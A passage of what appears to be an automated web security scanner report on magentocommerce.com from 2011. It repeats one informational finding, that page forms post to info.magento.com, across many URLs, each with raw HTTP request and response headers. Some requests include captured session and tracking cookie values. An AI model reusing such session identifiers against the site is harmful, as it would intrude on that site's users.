Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcompany%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:19 GMT
Content-Length: 45865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.14. http://www.magentocommerce.com/company/careers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/careers

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /company/careers HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175820; expires=Sat, 11-Aug-2012 15:03:40 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fcompany%2Fcareers%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:41 GMT
Content-Length: 37178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.15. http://www.magentocommerce.com/company/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /company/contact-us HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175829; expires=Sat, 11-Aug-2012 15:03:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:49 GMT
Content-Length: 59786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</p>

<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1001" name="mktForm_1001">
    <input type=hidden name="oid" value="00D80000000Lx9J">
...[SNIP]...
6.16. http://www.magentocommerce.com/company/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /company/contact-us HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175829; expires=Sat, 11-Aug-2012 15:03:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:49 GMT
Content-Length: 59786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.17. http://www.magentocommerce.com/company/contact-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /company/contact-us/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170931; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A4%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.7.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171048; expires=Sat, 11-Aug-2012 13:44:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:08 GMT
Content-Length: 59786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.18. http://www.magentocommerce.com/company/contact-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /company/contact-us/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170931; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A4%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.7.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171048; expires=Sat, 11-Aug-2012 13:44:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:08 GMT
Content-Length: 59786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</p>

<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1001" name="mktForm_1001">
    <input type=hidden name="oid" value="00D80000000Lx9J">
...[SNIP]...
6.19. http://www.magentocommerce.com/company/contact-us/thank_you  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us/thank_you

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /company/contact-us/thank_you HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175794; expires=Sat, 11-Aug-2012 15:03:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcompany%2Fcontact-us%2Fthank_you%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:14 GMT
Content-Length: 32829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.20. http://www.magentocommerce.com/company/events  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/events

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /company/events HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175835; expires=Sat, 11-Aug-2012 15:03:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fcompany%2Fevents%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:55 GMT
Content-Length: 69730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.21. http://www.magentocommerce.com/company/events/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/events/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /company/events/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175850; expires=Sat, 11-Aug-2012 15:04:10 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fcompany%2Fevents%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:11 GMT
Content-Length: 69730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.22. http://www.magentocommerce.com/company/inthepress  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/inthepress

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /company/inthepress HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175806; expires=Sat, 11-Aug-2012 15:03:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:26 GMT
Content-Length: 65303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.23. http://www.magentocommerce.com/company/inthepress/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/inthepress/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /company/inthepress/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175861; expires=Sat, 11-Aug-2012 15:04:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:22 GMT
Content-Length: 65303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.24. http://www.magentocommerce.com/company/jobs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/jobs/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /company/jobs/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175889; expires=Sat, 11-Aug-2012 15:04:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fcompany%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 133751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.25. http://www.magentocommerce.com/company/leadership  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/leadership

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /company/leadership HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175804; expires=Sat, 11-Aug-2012 15:03:24 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fleadership%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:24 GMT
Content-Length: 51387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.26. http://www.magentocommerce.com/company/leadership/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/leadership/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /company/leadership/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175837; expires=Sat, 11-Aug-2012 15:03:57 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fleadership%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:57 GMT
Content-Length: 51387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

